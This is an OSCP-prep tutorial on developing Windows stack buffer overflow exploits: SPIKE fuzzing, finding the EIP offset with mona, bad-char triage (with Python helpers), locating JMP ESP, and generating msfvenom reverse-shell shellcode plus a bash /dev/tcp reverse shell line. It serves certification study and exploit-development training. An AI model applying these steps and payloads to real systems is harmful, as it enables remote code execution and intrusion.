kashz-jewels
Last updated 3 years ago

methodology

NOTE: for OSCP prep, you can skip the METHOD 1: Spiking section.

  1. Run Immunity debugger as administrator

  2. Attach the vulnerable service to Immunity debugger

  3. Configure Mona working folder using !mona config -set workingfolder c:\kashz

METHOD 1: Spiking (finding the crash)

NOTE: there could be multiple buffers in the vulnerable service, we need to confirm which buffer is vulnerable.

  • ./generic_send_tcp IP PORT SPIKE_SCRIPT SKIPVAR SKIPSTR

    • use SKIPVAR=0 SKIPSTR=0 to fuzz from beginning.

file: spike_script_example.spk

s_readline();
s_string("to-send-something? ");
s_string_variable("0");

METHOD 2: Spiking (finding the crash)

NOTE: you can modify fuzzer.py to send a specific number of bytes and confirm the crash.

  1. Run fuzzer.py and note the crash byte number

Finding OFFSET and EIP

  1. Generate pattern 400 bytes more than crash using msf: msf-pattern_create -l <number>

  2. set PAYLOAD = <generated-value>

  3. Run exploit.py and find offset

    1. Using mona: !mona findmsp -distance <EIP>. The log window should show a line like EIP contains normal pattern : 0x6f43396e (offset 1978)

    2. [OR] using msf: msf-pattern_offset -l <number> -q <EIP>

  4. set OFFSET = <offset found>, set PAYLOAD = "", set RETURN = "iiii" (which is 0x69696969 in hex).

  5. Run exploit.py

  6. Program (should) crash with EIP = 69696969
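As an added worked example (not code from the guide), this is the pattern generation and offset lookup that msf-pattern_create and msf-pattern_offset perform, checked against the guide's own crash value 0x6f43396e at offset 1978; the crash byte count in the main block is a constructed value.

```python
"""Cyclic pattern and offset lookup, the same idea as msf-pattern_create and
msf-pattern_offset in the steps above. Added example, not code from the guide."""
import string
import struct
from itertools import product

UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits
MAX_LEN = len(UPPER) * len(LOWER) * len(DIGITS) * 3   # 20280 bytes


def pattern_create(length: int) -> bytes:
    """Build Aa0Aa1Aa2...Ab0Ab1...: every 4-byte window is unique within the
    first 20280 bytes, so whatever lands in EIP maps to exactly one offset."""
    if length > MAX_LEN:
        raise ValueError(f"pattern is only unique up to {MAX_LEN} bytes")
    triplets = (u + lo + d for u, lo, d in product(UPPER, LOWER, DIGITS))
    buf = "".join(next(triplets) for _ in range(-(-length // 3)))  # ceil(length/3)
    return buf.encode()[:length]


def pattern_offset(eip: int, length: int = MAX_LEN) -> int:
    """Map the EIP seen in the debugger back to an offset in the pattern.

    The debugger prints EIP as a big-endian number, but the 4 bytes were
    written to the stack in order, so 0x6f43396e means EIP holds 'n9Co'."""
    needle = struct.pack("<I", eip)             # little-endian: 6e 39 43 6f
    return pattern_create(length).find(needle)  # -1 if EIP is not from the pattern


if __name__ == "__main__":
    crash_at = 2000                            # constructed: byte count fuzzer.py crashed at
    payload = pattern_create(crash_at + 400)   # the guide's "400 bytes more than crash"
    print(payload[:12], len(payload))
    print(pattern_offset(0x6f43396e))          # 1978, the guide's mona example
```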

Finding BadChars using !mona

  1. Generate byte-array using mona excluding the \x00 null byte using !mona bytearray -cpb "\x00"

  2. set PAYLOAD = ( generated-byte-array )

  3. Run exploit.py

  4. Note ESP and find the badChar using !mona compare -f C:\kashz\bytearray.bin -a <ESP_address>

  5. Add the first badChar reported to the exclusion list and generate a new byte-array: !mona bytearray -cpb "\x00\xXX"

  6. Remove the badChar from PAYLOAD in exploit.py

  7. Repeat steps 3-6 until the mona compare output reports STATUS = UNMODIFIED

Finding JMP using !mona

Note: ALL badChars are needed to find the JMP instruction.

  1. Locate all JMP ESP using !mona jmp -r esp -cpb "\x00\xXX"

  2. Select one for which ASLR and the other protection columns are False.

  3. Windows requires little endian style. So,

    1. if JMP instruction is 0x12345678.

    2. Take two hex characters at a time, from right to left, to form the return address

    3. return address is \x78\x56\x34\x12

    4. set RETN = \x78\x56\x34\x12 in exploit.py

Generate msfvenom Payload

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= EXITFUNC=thread -b "badChars" -f c
msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT= EXITFUNC=thread -b "badChars" -f c

# windows under linux (wine)
bash -i >& /dev/tcp/IP/PORT 0>&1

set PAYLOAD = ( payload )

Prepend NOPs (\x90)

NOTE: try 32 if 16 does not work.

The msfvenom payload is usually produced with an encoder (to avoid the badChars), and the decoder stub needs some room on the stack to unpack itself, so a short NOP sled is placed in front of it. Set PADDING = "\x90" * 16 in exploit.py.

Manual Process

Finding BadChars manually

If mona keeps reporting new badChars after every removal of a possible badChar, it is time to do it manually. Follow the same process, but instead of using mona to check for badChars, use the following method.

  1. (top-menu option) View > CPU window > (top right register pane) right-click ESP > follow dump

  2. (bottom left hexdump pane of the same CPU window) the byte-array is displayed inline

  3. read it thoroughly and check whether all byte-array chars appear in order.

    1. If any char is skipped or missing - it is a badChar

    2. If byte-array-chars are missing after a specific char - that is a badChar

    3. Remove one char at a time until you reach the last byte, \xff.
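As an added example covering both the mona-based and the manual badChar sections (not code from the guide), this builds the byte-array the way !mona bytearray -cpb does, compares it against what landed at ESP the way !mona compare does, and renders hexdump rows for the manual in-order check; the service behaviour in the main block is constructed.

```python
"""Bad-char triage for the byte-array steps above (mona and manual).
Added example, not code from the kashz guide; the 'service' is constructed."""


def make_bytearray(badchars: bytes = b"\x00") -> bytes:
    """Same output as `!mona bytearray -cpb "..."`: 0x00-0xff in order,
    minus the bytes already known to be bad."""
    return bytes(b for b in range(256) if b not in badchars)


def cpb_arg(badchars: bytes) -> str:
    """Format the exclusion list the way -cpb expects it, e.g. \\x00\\x0a."""
    return "".join(f"\\x{b:02x}" for b in badchars)


def first_badchar(expected: bytes, observed: bytes):
    """Compare the byte-array sent with the bytes that landed at ESP.
    None means the copy is intact (mona's STATUS = UNMODIFIED); otherwise the
    first byte that was altered, or after which the rest is missing. One bad
    byte usually corrupts everything behind it, hence one char per run."""
    for i, want in enumerate(expected):
        if i >= len(observed) or observed[i] != want:
            return want
    return None


def hexdump(data: bytes, width: int = 16) -> list:
    """Rows like the Immunity hexdump pane, for the manual 'in order?' check."""
    return [" ".join(f"{b:02x}" for b in data[i:i + width])
            for i in range(0, len(data), width)]


def triage_round(badchars: bytes, observed: bytes):
    """Steps 3-6 once: compare against the array for the current exclusion
    list; return (possibly grown exclusion list, badChar found or None)."""
    found = first_badchar(make_bytearray(badchars), observed)
    return (badchars if found is None else badchars + bytes([found])), found


if __name__ == "__main__":
    def service_copy(buf: bytes) -> bytes:   # constructed: 0x0d truncates, 0x0a -> 0x00
        return buf.split(b"\x0d")[0].replace(b"\x0a", b"\x00")

    excl = b"\x00"
    while True:
        excl, found = triage_round(excl, service_copy(make_bytearray(excl)))
        if found is None:                    # STATUS = UNMODIFIED, done
            break
        print(f'badChar \\x{found:02x}; next run: !mona bytearray -cpb "{cpb_arg(excl)}"')
    print("\n".join(hexdump(make_bytearray(excl))[:2]))
```

Each round reports exactly one byte, so the loop ends with the full exclusion list (here \x00\x0a\x0d) and the unmodified array.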

Finding JMP manually

Note: ALL badChars are needed to find the JMP instruction.

  1. view > CPU window

  2. (top left pane) right click > Search for > All Commands in all modules > JMP ESP > search

  3. Choose a JMP ESP address shown in green, in a module whose name matches the running program

  4. Follow the above process to create little endian style return address

[OR]

  1. use !mona modules.

    1. Find a module that is being loaded with protection settings as False.

    2. use !mona find -s "\xff\xe4" -m MODULE_NAME

      1. FF E4 is the opcode for JMP ESP

https://www.kali.org/tools/spike/
https://resources.infosecinstitute.com/topic/intro-to-fuzzing/